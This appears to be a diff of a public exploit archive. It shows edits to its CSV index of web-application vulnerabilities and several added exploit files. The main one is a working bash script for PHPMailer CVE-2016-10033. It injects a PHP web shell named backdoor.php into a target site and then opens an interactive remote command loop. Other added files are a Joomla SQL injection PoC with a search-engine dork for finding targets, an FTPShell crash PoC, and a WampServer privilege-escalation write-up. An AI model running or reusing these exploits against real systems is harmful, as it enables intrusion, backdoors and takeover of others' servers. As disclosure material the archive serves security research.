6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
6723,platforms/php/webapps/6723.txt,"Joomla! Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0
6724,platforms/php/webapps/6724.txt,"Joomla! Component mad4Joomla! - SQL Injection",2008-10-10,H!tm@N,php,webapps,0
6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - (kat) SQL Injection",2008-10-10,LUPUS,asp,webapps,0
6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,php,webapps,0
6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0
6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection",2008-10-10,LUPUS,asp,webapps,0
6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' Parameter SQL Injection",2008-10-10,BeyazKurt,php,webapps,0
6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0
6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0
6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps,0
6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0
6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' Parameter SQL Injection",2008-10-12,Hakxer,php,webapps,0
6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0
6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0
6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' Parameter SQL Injection",2008-10-13,d3v1l,php,webapps,0
6747,platforms/php/webapps/6747.php,"WordPress Plugin WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0
6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - 'index.php no' SQL Injection",2008-10-14,EcHoLL,php,webapps,0
6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps,0
6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
@ -21181,7 +21183,7 @@ id,file,description,date,author,platform,type,port
8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0
8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0
8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0
8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
8958,platforms/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0
8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0
@ -22709,7 +22711,7 @@ id,file,description,date,author,platform,type,port
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps,0
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 - Arbitrary Add Admin",2010-03-27,ITSecTeam,php,webapps,0
11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
11904,platforms/php/webapps/11904.txt,"68KB - Multiple Remote File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
@ -31125,7 +31127,7 @@ id,file,description,date,author,platform,type,port
30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0
30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0
30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0
30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0
30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
31030,platforms/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0
@ -31218,7 +31220,7 @@ id,file,description,date,author,platform,type,port
30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0
30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0
@ -32343,9 +32345,9 @@ id,file,description,date,author,platform,type,port
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0
32431,platforms/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0
@ -34871,8 +34873,8 @@ id,file,description,date,author,platform,type,port
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0
36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0
36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0
36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80
36674,platforms/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
@ -36918,3 +36920,5 @@ id,file,description,date,author,platform,type,port
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0

Can't render this file because it is too large.

32
platforms/php/webapps/40966.txt Executable file
View file

@ -0,0 +1,32 @@
==========================================================================================
Joomla com_blog_calendar SQL Injection Vulnerability
==========================================================================================
:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability
: # Date : 26th December 2016
: # Author : X-Cisadane
: # CMS Name : Joomla
: # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/
: # Category : Web Application
: # Vulnerability : SQL Injection
: # Tested On : SQLMap 1.0.12.9#dev
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan
:-------------------------------------------------------------------------------------------------------------------------:
A SQL Injection Vulnerability has been discovered in the Joomla Module called com_blog_calendar.
The Vulnerability is located in the index.php?option=com_blog_calendar&modid=xxx Parameter.
Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated modid Value.
Attackers are able to read Database information by execution of own SQL commands.
DORKS (How to find the target) :
================================
inurl:/index.php?option=com_blog_calendar
Or use your own Google Dorks :)
Proof of Concept
================
SQL Injection
PoC :
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]

27
platforms/php/webapps/40968.sh Executable file
View file

@ -0,0 +1,27 @@
#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033
echo '[+] CVE-2016-10033 exploit by opsxcq'
if [ -z "$1" ]
then
echo '[-] Please inform an host as parameter'
exit -1
fi
host=$1
echo '[+] Exploiting '$host
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
echo '[+] Running '$cmd
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'

View file

@ -1,4 +1,3 @@
Gforge <= 4.5.19 Multiple Sql Injections
Vendor Notified: 2008-10-06

96
platforms/windows/dos/40965.py Executable file
View file

@ -0,0 +1,96 @@
#Exploit FTPShell server 6.36 '.csv' Crash(PoC)
#Author: albalawi_sultan
#Tested on:win7
#st :http://www.ftpshell.com/download.htm
#1-open FTPShell Server Administrator
#2-manage Ftp accounts
#3-import from csv
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
ban+="\x61\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
print ban
import struct
E = struct.pack("<L",0x00F39658)#JMP to KERNELBA.CloseHandle
#397
EXp="\x41"*397+E
#E2+'\x90'*1+E1+"\x90"*1+E+'\x90'*1+sc
upfile="Exoploit_ftpshell.csv"
file=open(upfile,"w")
file.write(EXp)
file.close()
print 'done:- {}'.format(upfile)

View file

@ -0,0 +1,80 @@
=====================================================
# Vendor Homepage: http://www.wampserver.com/
# Date: 10 Dec 2016
# Version : Wampserver 3.0.6 32 bit x86
# Tested on: Windows 7 Ultimate SP1 (EN)
# Author: Heliand Dema
# Contact: heliand@cyber.al
=====================================================
Wampserver installs two services called 'wampapache' and 'wampmysqld'
with weak file permission running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local user
to execute arbitrary code with elevated privileges on the system.
C:\>sc qc wampapache
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wampapache
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
"c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe" -k runservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : wampapache
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
PS C:\> icacls c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
BUILTIN\Administrators:(I)(F) <--- Full Acces
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated
Users:(I)(M) <--- Modify
C:\Windows\system32>sc qc wampmysqld
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wampmysqld
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe wampmysqld
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : wampmysqld
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
PS C:\> icacls c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
BUILTIN\Administrators:(I)(F) <--- Full Acces
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated
Users:(I)(M) <--- Modify
Notice the line: NT AUTHORITY\Authenticated Users:(I)(M) which lists the
permissions for authenticated however unprivileged users. The (M) stands
for Modify, which grants us, as an unprivileged user, the ability to
read, write and delete files and subfolders within this folder.
====Proof-of-Concept====
To properly exploit this vulnerability, the local attacker must insert
an executable file called mysqld.exe or httpd.exe and replace the
original files. Next time service starts the malicious file will get
executed as SYSTEM.